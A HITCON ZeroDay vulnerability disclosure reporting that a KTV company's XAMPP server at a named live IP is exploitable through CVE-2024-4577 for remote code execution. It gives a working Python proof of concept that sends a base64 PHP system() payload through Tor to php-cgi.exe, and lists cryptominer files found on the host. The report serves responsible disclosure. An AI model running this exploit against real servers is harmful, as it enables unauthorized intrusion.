星鑽視聽歌唱(巨星時尚Superstar KTV) CVE-2024-4577, 內有挖礦腳本 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00134
  •  發信 Vendor: 超級巨星視聽歌唱有限公司
  • Title: 星鑽視聽歌唱(巨星時尚Superstar KTV) CVE-2024-4577, 內有挖礦腳本
  • Introduction: CVE-2024-4577, 內有挖礦腳本

處理狀態

目前狀態

公開
Last Update : 2025/04/08
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2025/02/06 02:51:54 : 新提交 (由 d3r41l/\/\3n7 更新此狀態)
  • 2025/02/06 21:47:47 : 新提交 (由 d3r41l/\/\3n7 更新此狀態)
  • 2025/02/07 15:55:09 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/02/10 15:00:09 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/02/10 15:00:10 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/03/25 13:57:53 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/03/25 13:57:53 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/03/25 13:57:53 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/04/08 03:05:21 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2025-00134
  • 通報者:abby8050 (d3r41l/\/\3n7)
  • 風險:嚴重
  • 類型:遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://122.117.187.104:8080

敘述

網站是XAMPP架構,嘗試CVE-2024-4577成功RCE

import urllib.parse
import base64
from requests_tor import RequestsTor

cmd='<?php system("whoami & dir", $out); echo $out?>'

base64_str=base64.b64encode(cmd.encode('utf8'))
html_encode_str=urllib.parse.quote(base64_str)

rt = RequestsTor(tor_ports=(9050,), tor_cport=9051)
res = rt.get("http://122.117.187.104:8080/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3DXCANWIN+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3D%22data:XCANWIN/XCANWIN;base64," + html_encode_str + "%22") 

print(res.text)

圖片
挖礦腳本:C:\Windows\Temp\getjava.exe,其耗費CPU時間異常
挖礦腳本設定檔:C:\Windows\Temp\config.json
挖礦腳本紀錄檔:C:\Windows\Temp\loger2.log
C:\Windows\Temp\javaexplore.exe也是惡意程式

圖片

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;